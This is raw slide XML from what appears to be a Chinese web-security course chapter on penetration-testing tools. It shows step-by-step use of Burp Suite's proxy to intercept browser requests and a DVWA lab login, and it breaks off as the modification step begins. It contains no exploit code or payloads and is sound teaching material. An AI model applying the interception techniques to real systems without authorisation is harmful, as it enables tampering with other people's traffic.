                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、使用Proxy（代理）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（2）设置Firefox代理</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>打开Firefox浏览器，点击右上角的选项卡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，点击Preferences，点击General，找到Network Settings，点击Setting…，选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Manual Proxy Configuration，填写HTTP Proxy为127.0.0.1，Port为8080，点击OK，完成设置。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pP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4" name="图片 199" descr="C:\Users\lh\Desktop\第6章  Web应用安全（2021-7-12）\图片\6.1\6.1.50.png6.1.50"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3322955" y="3075940"/>
            <a:ext cx="3536950" cy="3319145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5857875" y="2070100"/>
            <a:ext cx="361950" cy="333375"/>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5318760" y="2395855"/>
            <a:ext cx="295275" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>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415026" y="-203755"/>
              <a:ext cx="1066603"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01</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sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>6.1 Web渗透测试工具</a:t>
              </a:r>
              <a:endParaRPr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1196320" cy="1499235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、使用Proxy（代理）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（3）发送网页请求信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Firefox浏览器地址栏中输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.66.133:80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，回车，发现浏览器应当处于暂停状态。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="605155" y="2577465"/>
            <a:ext cx="10687050" cy="3257550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5"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0922635" cy="1229360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、使用Proxy（代理）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）查看拦截信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查看Burp Suite，可以看到浏览器发出的HTTP GET请求，这个请求已经被Proxy捕获了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 -2147482545"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116330" y="2540635"/>
            <a:ext cx="8841105" cy="3943985"/>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38580"/>
            <a:ext cx="11090910" cy="4398010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、使用Proxy（代理）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（5）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在选项卡Intercept（拦截）中，四个按钮的功能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="240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40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400">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>① </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Forward：将拦截的数据包或修改后的数据包发送到服务器端。     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>② </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Drop：丢弃当前拦截的数据包。    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Intercept is on/off：这个按钮是切换开关。     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果按钮显示Interception is off，则显示拦截之后的所有信息将自动转发。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果按钮显示Interception is on，则请求和响应将被拦截或自动转发根据配置的拦截规则配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>置代理选项。      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>④ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Action：将当前拦截数据包继续发送到Intruder、Reperater、Sequencer、Decoder、Comparer等功能界面进行进一步测试。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000">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6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591310" y="2199640"/>
            <a:ext cx="5457825" cy="1190625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>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26515"/>
            <a:ext cx="11029315" cy="5171440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4、拦截</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>并修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>输入信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（1）在DVWA登录页面中，输入用户名为test，密码为test，点击Login。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（2）切换到Burp Suite，我们看到拦截了login.php的信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 -2147482544"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="797" t="7551" r="44475" b="-1179"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1561465" y="2537460"/>
            <a:ext cx="8783320" cy="3727450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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 name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1318895"/>
            <a:ext cx="10749915" cy="5186680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4、拦截</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>并修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
